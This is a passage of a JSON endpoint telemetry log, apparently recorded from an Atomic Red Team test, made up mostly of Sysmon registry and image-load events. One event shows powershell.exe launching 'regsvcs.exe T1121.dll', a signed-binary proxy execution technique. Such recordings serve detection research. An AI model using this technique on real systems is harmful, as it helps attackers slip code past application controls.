"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870119984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mscorlib.ni.dll", - "image_path": "C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\6715dc4d04e35f16d482900c355325e9\\mscorlib.ni.dll", - "pid": 5012, - 
"process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570868090000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, 
- { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clrjit.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570868250000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "timestamp": 131883570870580000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "event_type": "process", - "pid": 7696, - "process_name": "csc.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe", - "subtype": "terminate", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010A1714D01}" - }, - { - "command_line": "\"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe\" T1121.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1976, - "ppid": 7036, - "process_name": "RegSvcs.exe", - "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "subtype": "create", - "timestamp": 131883570870840000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wow64.dll", - "image_path": "C:\\Windows\\System32\\wow64.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "wow64win.dll", - "image_path": "C:\\Windows\\System32\\wow64win.dll", - "pid": 1976, 
- "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", 
- "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "RegSvcs.exe", - "image_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570870740000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570870900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
